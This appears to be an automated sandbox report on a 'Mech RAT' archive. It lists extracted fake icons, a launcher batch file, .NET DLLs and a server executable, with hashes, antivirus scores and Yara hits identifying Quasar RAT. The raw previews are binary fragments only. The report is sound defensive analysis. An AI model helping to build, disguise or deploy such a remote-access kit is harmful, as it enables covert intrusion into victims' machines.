                                                                                    Preview:............ .( ..f......... .h.... ..00.... ..%...$.. .... ......J........ .(...F[..@@.... .(B..nc..(............. ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (16).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 5 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):99678
                                                                                    Entropy (8bit):4.2695987261209645
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:5As1Fd6jrW6QKysmsolxc4nvPQIfjRuw+mqbz9j1MWLQes2aXS5Cjr:5AMwflmsolaTIrRuw+mqbz9j1MWLQs2
                                                                                    MD5:14465D8D0F4688A4366C3BF163BA0A17
                                                                                    SHA1:9F1FA68A285DB742E4834F7D670CAE415CE6B3B6
                                                                                    SHA-256:3F3C5CE486E5B9FA88DC60B60916053E8808C69167DF1A11287FD3CD6DB1CA6E
                                                                                    SHA-512:01DB4FAC75136BAF9C162265785877B21FBA9C4B8D9DBE4E495191F15AA9C914E3D5BAF1C4606041279A7138C7E5C8F4CCF6E64689354FC3FB3FA66AB3B1DA2D
                                                                                    Malicious:false
                                                                                    Preview:......00.... ..%..V... .... ......%........ .h....6..@@.... .(B...;........ .(...6}..(...0...`..... ......$.........................................................................................................................................................................................................................................O.......}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}.......s...*.......................................*Bgq......W...;........................................................................................................................................%........................................@"....B..................................................................KK..MM..""..................................................................%%l........................................@....................................................................uu..............DD

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (17).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):67646
                                                                                    Entropy (8bit):4.383177716108049
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:keGRHCUZYDikdQarfw8lGqMtxoYDQqrp0KR1QCOICdu2kkyPgE+zi/hScVsUIGVN:8fY/lVoTlR1vCU/he6H
                                                                                    MD5:167425A3FA7114B1800AA903ADC35B2A
                                                                                    SHA1:601E8BD872EA31AFF03721A0361E65A57B299CAD
                                                                                    SHA-256:12F600B09C0DB00877684A950FC14936ECC28DF8F0DDC6821D68E4B82077AD92
                                                                                    SHA-512:586CE1360EB06F1DF8E95AD178ABFAE7C9D41CBA1BE55276B3D3947D0504CA09185E543B7DBF1BA72DDE4942FF626859A6D2E8A1FAAAF6C5DAAEBD8740DCF538
                                                                                    Malicious:false
                                                                                    Preview:............ .(.......(............. .....................................................................................................................................................................................................................................333.333.+++.$$$. . .........333.333.........................333.333......... . .$$$.+++.333.333.....................................................................................................................................................................................................................................................................................................................................................................................................333.$$$. . .333.........'''.;;;.777.333.000.---.999.999.999.999.666.666.999.999.999.999.---.000.333.777.;;;.'''.........333. . .$$$.333...................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (2).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):115478
                                                                                    Entropy (8bit):5.809600725069547
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:WE4NpLpq8Bb7RFRz8nqF+o2Hc0cccwccyccxcccMcccNmccdccccTccccncccNJ+:j4NpVq8BxFRzaqF+o2GQJ7/JzqVfGv2
                                                                                    MD5:F1463F4E1A6EF6CC6E290D46830D2DA1
                                                                                    SHA1:BDA0D74A53C3F7AAF0DA0F375D0C1B5ACA2A7AAF
                                                                                    SHA-256:142B529799268A753F5214265C53A26A7A6F8833B31640C90A69A4FF94CEE5EC
                                                                                    SHA-512:0FA93D009CC2F007D19E6FDDA7EBE44C7ED77F30B49A6EF65C319133C0570AB84F2D86E8282B5069D7F2E238547722AC3966D2FA2FAE4504133F0001A0387AE2
                                                                                    Malicious:false
                                                                                    Preview:............ ..=..f......... .(....>..@@.... .(B..6F..00.... ..%..^... .... ............... .h........PNG........IHDR.............\r.f..=oIDATx..w|.....w...a.w.7....B.._......BB !.o.....R..j ..l.{3n`..n.Fn.eu]...j.........i?..X...3.{.<....8Hi.=!... .....7........o..< ...n.-....>..........9.... 8 ....v.xw}].........}.=)CJ.X....n.o,0.(i.....E.YD.....B.....[.r`..b.>6..x./...At8..f.6s.G.9E..`*0... K..J.....`...X-.........D>O...(.$c......X......_...GX.L.t!l...X....%...xwm....18. ..9c.'....I.BZ...J... .~`-..X.......[.=P.1.Q......K$..............:.....E...|{.!.n...Q.q.............uo.P....i...?y....GJ.....18..Bl.1>......R.L.n..Q.J.....^....g....I=Z.G...#G.Wq...b.t '..Q.1+.`..O...w..-.|S....p..Il.1.(....F06....,U..._..[h..o..V..AW8.. ...7..>p.....St.@..@.....A.:..._......P...2Q.5..\#`...pG...8...)Z..7.{{.+.[..3..-s&i..=..9.Uy...:. |..+..O...h....\.P..'.Q.a..l...\.......8. e.@;6.7f6g<U..G.".....P9i.........p4..H9.....e?Q.9...u.....i-..d........H.v.[k.S.R...+.-

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (3).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):134903
                                                                                    Entropy (8bit):5.838260652902566
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:Ms6se7llqn17KineXd2wwKtivEYoNRh8RX9EIKhI49NT:MsgbcUieNJHKoPC5+Ld
                                                                                    MD5:A512719EFC9E6ECC5E2375ABCEB1669A
                                                                                    SHA1:51FAE98EDFAB7CD6B6BAAC6DF5ECBDA082EEB1DB
                                                                                    SHA-256:B2F7FB22CD5B935CF19A2F58F7FEF9DB99DB40772FF4BB331A73C345161C2574
                                                                                    SHA-512:E0153DBC8F3FDDA8D1A7082BC30A3895D7F4B3BC2982B4B4ECE55653D1B4C293EBA3BA6D4A0A581F0F7DB95AB287D6616EF7BF03AF4485904111798BF9D9E625
                                                                                    Malicious:false
                                                                                    Preview:............ .....f......... .(......@@.... .(B......00.... ..%..?... .... ............... .h........PNG........IHDR.............\r.f....IDATx..w.$Gu...gf..|.;.P".JHH..H..!0.`..a.166`..69.&...&..@ ..@9K'.N..;]....~.?:UWWu......g..^.....+4..,<.@Gx...x..1..0...t.Su.]:.I3._7.f...0.e.#,.......t{~.`....~.:B.|.88F]8.m..Y..}.:...j.v...,L..j..._.......z.x.L....d..0..`..0...8.`..#f.F..Y..L....f5.Y.@#Z.'.pd.4O..S.?..v...,.......^.@.0.9.......p.L7...f..,.7.#..>..2...(.y...0.|XGfM..,.......d.q.....8...L..3...;.r.Y./@G8...hB.....32L..@..b.....{f...W...fa.!^..!..@.2O...'.E.._...g....0..fa........A.\..........#.B.0..faFA.a..)B.!(Y..:1....^>...x.Y.0.3..o....+....D.a'|LGx.L?...f..,.......C6....@.$.;.|UGX3...x.Y.0.3.-.... Z.S....q..].|#^J<.5`..........2.l.......$.K:Bk.......`.f..y;B~......Z'C..N.....J.j.e....A....\.C...^4. r....W..5;=X..n.,......a....,FX.2.a."...@....h.&Tt..qDw!.Dt;.[..Da.xs.N.}sxKQ./.B.Mh=.&..p...v`3.}...+.U..........9..C.9.a."..Y.3.&"1q'...I.......;

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (4).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):128774
                                                                                    Entropy (8bit):6.18435580616356
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:zVRUhw3TWxcZss+SP21wH7QOK/PPLr8zdYpizfgMRHGuTRLJHPxDsPsx3CXhRcVN:ZRUGKXs+S++7KFSbxeY+qDDrMY
                                                                                    MD5:9C053BEF57C4A7B575A0726AF0E26DAE
                                                                                    SHA1:47148D30BC9A6120A1D92617BF1F3E1BA6CA1A2C
                                                                                    SHA-256:5BB21D6C04ED64A1368DACE8F44AFF855860E69F235492A5DC8B642A9EA88E41
                                                                                    SHA-512:482D639BA60F57827D8A343F807F4F914289C45643307EFAA666B584A085FE01AC7892252F41B7756FDE93D215B4F3FED16E608BC45102D320D77239FA93146A
                                                                                    Malicious:false
                                                                                    Preview:............ ..q..f......... .(....q..@@.... .(B..&z..00.... ..%..N... .... ............... .h........PNG........IHDR.............\r.f..q_IDATx..w..Wu.{..lKr..6..c.p......v..I..@...{..H..NBKBB.%.P...i...`...p..$...+].v.....s.M.K..3....3k..Z{.=.%..+~.D.$......20...Y..L.... ..d.......\.1L.. .....%........N.].+.,.9.8.8..D..c@....Y.r(.. ..H+at...'.K.2...$.80....0.............2...<+...Y..$..(..b..2.......p.4A.....-.Q.Q.?......W......'..w.....rgz.......)..]"EK.`....... ..N.....r.p.p... 9..).. ..s...S]..2........z._......S......!-..y.G_qs.8.8.x...3..%..N.)9.MA.@@X..I;...a7.M.. ..7...../.....x..Z..sH.^wk.x(...........R..U1.[~....c....2.m. ..] .c`-.. [n|...|..HK.`..1.n'u.=.x>.s%....&...H....3...5{#..Y.I...@.G".n.v....Y2..HK.`..1.n_.<.x1..S..E.WW/.A`...eJ.LSa..S$....o.k..7>.w....`Z......s9...<....].]..JY......~z#.0 4`.ew..../`.......%S..Z..3...x4. ....V.j.`ZE......j.6.....h...`....1.= ?...\s.S^<...-......e...../!..K........~.^.@.B$x}/_@6.#_0.7@6....:,Q

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (5).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):102601
                                                                                    Entropy (8bit):3.0259696734344237
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:sVLDqC6ot/2AlVx1qa6mgIwEk4w00wILxuudXCnadwyHXZ:EH/6A/9d1qDIwEk4w00wsuuXdwyHJ
                                                                                    MD5:9DBDD6972E129D31568661A89C81D8F9
                                                                                    SHA1:747399AF62062598120214CEF29761C367CFD28A
                                                                                    SHA-256:45C85BDAAF0E0C30678D8D77E2585871EA6D1298EE0D30037745BACEA6338484
                                                                                    SHA-512:E52572DE3F0D57D24A24D65ECA4FF638890CCC9C5ACA3F213FF885EDA3C40DE115849EB64C341F557D601F566CE21F8FC0DF25CC4B13AAAD5E941449A6B7F87D
                                                                                    Malicious:false
                                                                                    Preview:............ .[...f......... .(.......@@.... .(B......00.... ..%...V.. .... ......{........ .h...a....PNG........IHDR.............\r.f..."IDATx...=S[g...KH ...%2..,4;..~.k;w!.]..}...|......[..E..Kf(.....2..C...-t..X.EHGz....5.c,.<.s...H...................................................................\...?...5W;.r.g..Q.V.....Ij>}.....{c.;. ..@..7wW.Y..f.q.......Ij>}...c.B...#..D~sw..V.V...o.{e.f..I.O.Bw.#..... ....5..~..O..`u[..O....!.H..c$.!..o$.! ......$6._..].>e..nK..$...8F.HXlm~......#..{./..... !...5....g......p........C.....I......p..pO.........dE'.U$......p......5kV..[.....|....CiD...#..!v..>t_..%.@'.......\.G.I ...8F...<..c.@...p..`bk...r..mQ.X.... .....L~sw....%.EX...'@...+..@h..|......o[....0.......N..1t_.*....6L....~...X+..V.>........y.......IR..|B.t.\...c ....J.?+@...K.,......:..}.o...........O.i]J.r......gI..W..L......{.j5t.....8..1...UkU.~..K..?m.__KR.y.A6.H..W...8.~..._....7J...dT.W~.u.;9n'...$.l....#.@........~.j&........#..

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (6).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):108974
                                                                                    Entropy (8bit):4.669155282743326
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:LZe7enyslZ87gUcXmEHNBFNJC5jWb2NM2:Npysa7iAM2
                                                                                    MD5:D7C9666D30936E29CE156A2E04807863
                                                                                    SHA1:845E805D55156372232E0110E5DC80380E2CB1E5
                                                                                    SHA-256:6EA04CF08751A2F6BB2F0E994258A44D5183B6CDB1471A0EE285659EADA045B5
                                                                                    SHA-512:3CFD7A41F65C5A0DC23A90C6AF358179EFB3AE771F50534C3D76C486FE2D432EA3128A46B4B367C4714E86E8C0862A7385BD80662FE6EA82D7048F453570ED56
                                                                                    Malicious:false
                                                                                    Preview:............ .@$..f......... .(....$..@@.... .(B...,..00.... ..%...n.. .... ............... .h...F....PNG........IHDR.............\r.f..$.IDATx..y.$e.....Yg_tw.t/..............PxN....3....@u.....53.........5. .*..6....t5M.TuUgU~.G..qedD~q....!+.....}.}.+@..A..A..A..A..A..A..A..A...c..@...K.i.<.x1p".\..`...X..........?...v.w.wU..}..#.C.@......^...x.p<`vXm....C.;`.^)....W..1..c..S..q2..x#.&.&.......m.N.y...kd......f....i......$.?.l+*..D...z...4.:...x.ny....P.M./Z.[.L#. ........Y.,.\.|.R.>.[..". ...........u...............b.R.....*.T^..>..J..K. YB.@J8...s...f._......*..nA.....P.t..0.6...N..us.xGa.......-K.I..yFF.s.C}...t.{...z....d........../...%......V.=K.,.%.o.L..v..I...r.4.<W. iF.@B......-G...FF._.[.."!@......p...-K...l...;u..6..$....g.. .M<q.^.T).'t..&$.H..Z.z./.S~......b.C.&b......'.C#..s...n!....adt.8..6.u.....$.......GG...'.......-DZ....L8.x.n9b..GF.7.."....9...2.........-D....s.....\..1...qY#.!q?,B....Z...u.I".:k..d5.1.+.^......\W-Mw[&...1#..Gb.zg

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (7).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:Targa image data - Map 32 x 3467 x 1 +1
                                                                                    Category:dropped
                                                                                    Size (bytes):168697
                                                                                    Entropy (8bit):7.105748636848575
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:Y8SKfbzxcwg7es6/Vsb8VKTu549oJMfF/H9N3Ky9NzLn+:YUhcX7elbKTua9bfF/H9d9n+
                                                                                    MD5:7891C91D1761DC8A8846D362E6E31869
                                                                                    SHA1:0229BB01B7B4A0FCA305EB521EC5DFBAA53674EA
                                                                                    SHA-256:29D38C75AF79AA0554F34CDFECB311F88F8DD02B02FACAA299B9700841806AB8
                                                                                    SHA-512:ED14614A706DA985566853DC13DF0D1128A718F39EC9957320813803FE07E59DE337D51033970E2F57D9F56DA3546C506F5F0F3BECFA91CE741576855BE14BA7
                                                                                    Malicious:false
                                                                                    Preview:............ .....f......... .(.......@@.... .(B......00.... ..%..AX.. .... ......}........ .h........PNG........IHDR.............\r.f....IDATx...g.eYv........./_m....Aw..&.&aD..AB.D3.A.K......0.FCP.f$R...Z.A..h@.$(. .C..Fw.MU..Y....{.9g..p.3....YU..........s.>....p...}.O..>..t...}.O..>..t...}.O..>..t...}.O..>..t...}.O..>..t...}.O..>..t...}.O..>..t...}.O..>..t...}.O..>..t...}....Z?.}........7..|..O...o............=...Q.Q. .r..b.."=.?......P:P.@%.....j,..r..{.L...c............CU....P.......*c06..z.....+........?.......~......_vj..w.mgW...../.,....q...z......b...u>3p...puE..DI...,..w8_..@e.8.E.k....C..jX..e@..EbD.X5......~......k!...9...+d.b.T...$(..L^..}.......~.#........o=..........S3...O_.z..;....=..].@...S9\.!.....j...g.`....x.....M..EM.."T.@e.....s...{.m9.W...*.Y....j..i.(..a.fH....L..n.......!...9...e..W......|..._v./.....G....#..c......x.4.p....V..j...0...Qg.]sp...7a...\!o.&38.Q.Q.Y..^.q......X.. ......)<8..n..q...|.....<..c.|....|...."O

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (8).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):110950
                                                                                    Entropy (8bit):5.326047794906225
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:ygjWAisCkoAbhMDB8dfO944J+IiIxzAILEhmtkW9iVHD:yOybBYfOS4J+1oEhyiHD
                                                                                    MD5:AF1739A9B1A1BF72E7072AD9551C6EEA
                                                                                    SHA1:8DA0A34C3A8040C4B7C67D7143C853C71B3D208D
                                                                                    SHA-256:A65CBBDC2CA671A9EDD7EDAC0C6737B3B116E357727E003E5FDEFF163C6C21AB
                                                                                    SHA-512:EEEAC307371C38B75E256083C55A3FE4AB096C1C7520A4B7ACB40FAD3AF5A0D6C88AAF85F2C3E418034ABEE422C2A3BA13731ADF7EE6078016DA4DD2E989B120
                                                                                    Malicious:false
                                                                                    Preview:............ ..+..f......... .(...^,..@@.... .(B...4..00.... ..%...v.. .... .....V......... .h........PNG........IHDR.............\r.f..+.IDATx..y.$.U.....uv.}..LK.C.=.....-...m0........b.]l...x....`..cl..`c..5 .%...9....Q....TWOuW...udu.._.......^...E.@..A..A..A..A..A..A..A..A.D...VD......[...`.@..."v-E........_,.w.Z4L...............f...-i....o..-.!R..l...........A.x..O.....H.. .................W....'..f..%.........W..hwR.....].......W..p.........m...AXp.|...v+..0A.....nv?.B.....D...C.:........V .`.5...A.`.|...B....hv....m...J...... .....%.@...n/....A..R...cH....!.@.>...A..R...cH....!.@.>...A..R...cH....!.@.>...A..R...cH....!.@.>...A..R...cH....!.@.>...A..R...ch.{......C.`...fw.a.!.j..!:-....w..0A....d..a...^.'o.3.E.`...9....k....@.>...A..R...cH....!.@.>...A..R...cH....!.@.>...A..J.6#.nv.....R.c`L....D..n.......d..`.Zj.b &...aH.0|.H.g.. ...<x*..MA.........d....b...h9..D>...Q.7+.k..L..H..R.D..S.P..\..b..J...9...y.A......{?7...G..o...=|{S.L..b.P.....&..-.A1.

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fake Icons\icon (9).ico

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 256x256
                                                                                    Category:dropped
                                                                                    Size (bytes):270398
                                                                                    Entropy (8bit):5.543245919551853
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:HAZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ+ZZZZZZZZZZZZZZZZZZZZZZvZZZ+:H+GIIIIIIIhIIIIIIIIIIIIIIIUP
                                                                                    MD5:3E24E40B41ECC59750C9231D8F8DA40B
                                                                                    SHA1:91A701CF25AEA2984F75846B6C83865D668CCAD6
                                                                                    SHA-256:BD1C33A67244801E828035904882EC53BD2EA8A1DB9265A06D1AA08CF444CA80
                                                                                    SHA-512:FE62EDDDB62DD4B695F1EF40FFB7A0119D480D1C176F0254ACEE19A45D6433EF6C308ACBE567C721018390626C71F7A0F7BCD195D59D54C19CF019F13C4F7572
                                                                                    Malicious:false
                                                                                    Preview:..............( ......(............. ...... ...................a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...b...c...d...e...f...g...g...h...i...i...j...j...k...l...m...m...n...n...o...p...p...q...q...s...s...t...t...u...u...v...w...w...x...x...x...y...z...z...{...{...|...|...|...}...}...~...~...~.............................................................................................................................-...E...[...n.......................................................................x...g...Q...9...".........................................................................................................................~...~...}...}...}...|...|...{...{...z...z...z...y...x...x...w...w...v...v...u...u...t...t...s...r...q...p...p...o...o...n...m...m...m...l...k...j...i...i...h...h...g...f...e...d...d...c...b...a...`...`...`...`...`...`...`...`...`...`...`...`

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Fixer.bat

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):181
                                                                                    Entropy (8bit):4.409440084125115
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:BKDDkttAZlV8svLkgo2NNoxLoanv2AZOq4NMA7OizM2A7aAq33lFXe+X2:SwTAN8sF9LoNoaOUMmACiQ2A+AqfX+
                                                                                    MD5:AA83EC2039ECFD3A62E463CD7DC3C643
                                                                                    SHA1:20D2D9A5FB08C6CFC2FCED79285DF9436697AF71
                                                                                    SHA-256:1BE31323576FD536E78B9474F94FC84C4A647E8E9E98C2F357D5B34D1F924C37
                                                                                    SHA-512:54C6587C01E9F1575AB10A3224241BA8E9CEB17B219F8DD0F5265B596264A233FC53DB1C4BA98CC883ED130828A59128D20DFE65A7B29F916C420A612336BCCC
                                                                                    Malicious:false
                                                                                    Preview:.@echo off..REM use this if Server does not open..REM only use if it does open....REM Change this to the der of Mech Server..start Mech Server....exit....REM just run after saving

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Gma.System.MouseKeyHook.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):57344
                                                                                    Entropy (8bit):4.954230269315775
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:qYnDJGdu2oE3d7ltSl+Y8sCcm8Doi/L0CPw87qquEZ+r3FhuiFJ8G:VncoU48/AzPwYpNZ6rXJ8G
                                                                                    MD5:BFB3BD1CB571360435100BFA6ED2B997
                                                                                    SHA1:1325E8DD76180A165117E04DA4EE4A020E996880
                                                                                    SHA-256:A67A424013544C8270C12633E2E1E287CD5CF0B3F2E81E8D8204B37A03DA59EF
                                                                                    SHA-512:AE5A88A9E86B9E64B8C289213F814586DFA5FE5E0CC21BDBC3E48C36D81FA9E763C6E78F24E40DF07696228270AD72F408846125E61E33CAE867EF8FF88A3C15
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+.hZ.........." ..0...... ........... ........... ....................... ............@.................................h...O...................................0................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Guna.UI2.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2156424
                                                                                    Entropy (8bit):5.825972764437023
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:1BGZRDJCizd4UwKGU2pFumG5sx9YzhJY+9O5L9uuKOHHT58agrj7fsfnbDF17F3A:zmC17Fw
                                                                                    MD5:DF5DD00BFA6F9B477CBD59CBDDB75A00
                                                                                    SHA1:EFC2B30AA830444FA5159FF8DF187A8E7B5B6AB5
                                                                                    SHA-256:163A2AA94061D1ED03C19C41D9F18E0CBAE3A8F71FE78A46EF332E5DF39C8DA5
                                                                                    SHA-512:3D8405EEF2F19E40358ED91069C295911F67AEAFF7A440B98E01A9799E485526DB9788AAED99E5E046C6755AA075B6DE9A0991F99F553A3EDF334748A77ADF10
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Guna.UI2.dll, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U.;..........." ..0... ........... .. ....!...... .......................@!......]!...`................................... .W.....!.|............. ...... !...................................................... ............... ..H............text..... .. .... ................. ..`.rsrc...|.....!....... .............@..@.reloc....... !....... .............@..B.................. .....H.......PM..D................l..P ...................................... 9GF@vg.x1..s.f....S.'...-.s...NW....u...n..E7?.Q[...$.k...0...\......U ...O.W......Ww.B.o8..B.w......>.y...z5|....lC~..$.......?.p}?...?......L>...>...?..L?...?..........L>...>...?...?...... .-.!.<.>.{.X.x.=.....H..>...?...?................1...E...Y...m...........}.Y.y.=...(N...*r.(N.....}V.....}W.....}X...*^.{a....{b...o+...(;...*...(......u....}.......9...(S...(....u9...}....*2.{....o....*b.r%..

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):1882112
                                                                                    Entropy (8bit):7.653685332295367
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:VBOhYWy4K8A0FX+qmzJuIIIJlvQTl/+bXSIIrIII3KIIIIIIIIIIedRmfNclV:ry2u0FVAcV
                                                                                    MD5:1D2F632A4793126BBE684D1ED5BBE2B8
                                                                                    SHA1:D65A862A3179676BB38FD67178FD04E96554806F
                                                                                    SHA-256:2C832B203E3A0923958116CBE92FC553DD7004191D7B4948656680CAD0B17B36
                                                                                    SHA-512:1F8EA6634BAAFB2ADF78DD0B16C5207EB6DD4F972F47A73319F2FF6B1410FE36C778BF0A576A1D40D99B65A43B7CC15B714CE53DA659AF5C05892D8A71F9A93D
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, Author: Joe Security
                                                                                    • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, Author: Florian Roth
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 53%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e ..........."...0..*...........7... ...`....@.. ....................... ............`..................................7..O....`..............................l7............................................... ............... ..H............text....(... ...*.................. ..`.rsrc........`.......,..............@..@.reloc..............................@..B.................7......H.......H...............d................................................*..(#...*. ....($...(%....(&...s....('...*..(#...*V....s(...}.....(#...*..{....*"..}....*:.().....(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*.0..)........{.........(*...t......|......(...+...3.*....0..)........{.........(,...t......|......(...+...3.*....0.........."...?.[..{.....o-....{....o.....d1>.{....o/...&..{....~....%-.&~..........s0...%.....(...+(....+...(......(....s....o.....(.....

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.TestPlatform.AdapterUtilities.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):29584
                                                                                    Entropy (8bit):6.437352220756666
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:MoGlVXd5QgRbo/cqR3gMdny654nKDdhUauvc//FyHRN76JVOY/wR9zmuyzy1:wDOgRcOIUarFu4/M9zmO1
                                                                                    MD5:2E02F737BAABDA557D62C88443AE7C01
                                                                                    SHA1:A4F3A6A3B7C5D371474FBB9A4D51F0E75ECC0927
                                                                                    SHA-256:2570CBE12E3F6C177362EAAD630B42DB3114C2BB74099A0BAA2D3ABD6BCB5303
                                                                                    SHA-512:646C34A76DD20C808346E87BD68C6074FDDC3194DF0CFBAB345E2E08D8D480FDECD6E544836A07F74898D4276FD7F30B964AA0FA260178492639913E7BEAB650
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
